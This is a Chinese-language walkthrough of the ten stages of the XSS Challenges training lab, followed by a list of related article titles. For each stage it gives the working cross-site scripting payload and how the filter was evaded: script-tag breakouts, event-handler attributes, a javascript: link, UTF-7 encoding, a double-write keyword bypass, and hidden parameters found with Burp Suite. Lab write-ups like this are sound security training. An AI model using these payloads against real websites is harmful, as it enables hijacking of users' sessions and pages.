Stage #1

1、输入特殊字符判断位置

2、构造Payload

"</b><script>alert(document.domain);</script>

Stage #2

1、输入特殊字符判断位置

2、构造Payload

"><script>alert(document.domain);</script>

Stage #3

1、输入特殊字符判断位置

2、构造Payload

"</b><script>alert(document.domain);</script>

发现失败

原因

  • 用于标签构造的<>被转义了
  • 用于匹配掉双引号也被转义

使用burpsuit抓包发现两个参数

3、重新构造Payload

p1=1&p2=Japan"</b><script>alert(document.domain);</script>

Stage #4

1、输入特殊字符判断位置

2、构造Payload

"</b><script>alert(document.domain);</script>
p1=1&p2=Japan"</b><script>alert(document.domain);</script>#&p3=hackme

发现失败,p1和p2参数<>和双引号都被转义了

3、重新构造Payload

p1=1&p2=Japan&p3=hackme"</b><script>alert(document.domain);</script>

Stage #5

1、输入特殊字符判断位置

2、构造Payload

"><script>alert(document.domain);</script>

发现有个maxlenth限制长度,可以直接修改maxlenth然后输入

成功

Stage #6

1、输入特殊字符判断位置

2、构造Payload

"><script>alert(document.domain);</script>

发现<>符号被HTML特殊字符代替,说明输入内容被HTML实体编码,不过双引号可用

3、重新构造Payload

"onclick="alert(document.domain)
”onmouseover=”alert(document.domain)

Stage #7

1、输入特殊字符判断位置

2、构造Payload

"onclick="alert(document.domain)

发现双引号被转义了,使用空格分离

3、重新构造Payload

= onmouseover=alert(document.domain)

Stage #8

1、输入特殊字符判断位置

2、构造Payload

链接在a标签里

A标签用javascript执行:
javascript:alert(document.domain)

Stage #9

1、输入特殊字符判断位置

2、构造Payload

"><script>alert(document.domain);</script>

发现构造失败

使用Burpsuit抓包,发现euc-jp,需要使用 IE7浏览器 将payload构造为 UTF-7编码

3、重新构造Payload

p1=1%2bACI- οnmοuseοver=%2bACI-alert(document.domain)%2bADsAIg- x=%2bACI-&charset=UTF-7

Stage #10

1、输入特殊字符判断位置

2、构造Payload

"><script>alert(document.domain);</script>

发现domain被过滤,需要绕过domain过滤,双写绕过

3、重新构造Payload

"><script>alert(document.dodomainmain);</script>

XSS Challenges通关教程相关推荐

  1. XSS Game通关教程

    12.XSS Game通关教程 1.Ma Spaghet! 审查源码 一个不安全的方式,直接get传输somebody 输入123看看位置 ?somebody=123 如下 用下input标签即可 & ...

  2. 黑客之XSS注入练手:XSS Challenges通关指南

    本文目录: [TOC] 一.XSS Challenges介绍 靶场地址:http://xss-quiz.int21h.jp/ 相对于别的靶场来说,这是一个模拟真实环境的xss平台,页面不会给出任何提示 ...

  3. XSS入门 XSS Challenges靶场搭建/前五关/基础教程

    前面写了很多XSS漏洞的利用,这一章开始重点在XSS漏洞的挖掘和如何注入script代码上,和sql注入相类似 目录 一.实验环境--XSS Challenges 二.探测XSS过程 第一关 第二关 ...

  4. 独孤九剑xss通关教程

    独孤九剑xss通关教程 独孤九剑第一式: 这里过滤了 =() 构造payload: ?data="><svg><script>%26%23x65%3B%26%2 ...

  5. xss.haozi.me通关教程

    10.xss.haozi.me通关教程 0x00 首先整体浏览网站 分别是xss注入点,注入后的HTML代码以及网页源码 构造常规payload: <script>alert(1)< ...

  6. XSS学习笔记:XSS Challenges 1-19通关全详解

    前言 学习下XSS 主要是XSS Challenges 平台 共19关 模仿真实xss挖洞的情景,用浏览器中的f12中搜索,找出我们控制的代码所在的位置 思考那些个位置哪个或哪几个位置可以被注入我们想 ...

  7. pikachu通关教程

    pikachu通关教程(暴力破解和xss) 1.暴力破解 基于表单的暴力破解 1.最简单的暴力破解没有验证码不需要绕过,直接进行抓包. 直接找到一组账号和密码 验证码绕过(on server) 先进行 ...

  8. xss challenges闯关详细(6-10)

    XSS Challenges (by yamagata21) - Stage #1 目录 一.第六关 二.第七关 三.第八关 四.第九关 五.第十关 一.第六关 输入good man测试 回显位置,输 ...

  9. Sqli-labs全通关教程(手工注入+工具使用sqlmap)

    提示:手工注入就不写了,发现有很多了,质量也还可以,今天就写个sqlmap通关教程吧 文章目录 前言 一.sqli-labs1-10(get型) 二.sqli-labs 11-16(post型基础注入 ...

最新文章

  1. Linux内核系统时钟管理 感想总结 (未完待续)
  2. DCMTK:DSRDocument类的测试程序
  3. 如何根据SAP CRM扩展字段的UI标签找到其ID
  4. IDEA 底部工具栏没有 Version Control 解决办法
  5. Pytorch构建模型的3种方法
  6. c语言水仙花验证,[编程入门]水仙花数判断 (C语言代码)
  7. (译)如何使用cocos2d制作一个塔防游戏:第三部分
  8. 都2020年了,你还认为BI=报表?
  9. 6.1-数据结构算法-堆栈与队列
  10. 返回信息是html的性能测试,Web前端性能测试小点
  11. 常见的 web server
  12. 易语言大漠透明图制作与使用
  13. 一个工业相机通用类解决大部分业内流行相机的访问(基于大华相机的动态链接库开发的通用相机类)C#版
  14. 《梦幻西游手游》分析报告
  15. Latex中如何插入参考文献的两种方法
  16. input类型为number时鼠标滚动出现箭头
  17. 科技爱好者周刊(第 190 期):产品化思维
  18. Leetcode #1 Two Sum
  19. 论文阅读-Combining EfficientNet and Vision Transformers for Video Deepfake Detection(深度鉴伪)
  20. bzoj 1503 (权值线段树)

热门文章

  1. 痞子衡嵌入式:串口调试工具Jays-PyCOM诞生记(4)- 联合调试(vspd, sscom, PyCharm2018.2)...
  2. 微信好友性别分布与签名分析词云图
  3. 2022年吉林省高职单招(职业倾向性)考试强化训练及答案
  4. 常用音频编码格式简介(PCM、G726、ADPCM、LPCM、G711、AAC)
  5. python函数**什么意思_python中函数的参数是什么意思
  6. 强化学习(二):马尔可夫决策过程
  7. foxmail邮件数据和通讯录的备份恢复
  8. foxmail导入csv邮箱联系人乱码
  9. java中三web_Java Web中的三大器
  10. 云原生数据库VS传统数据库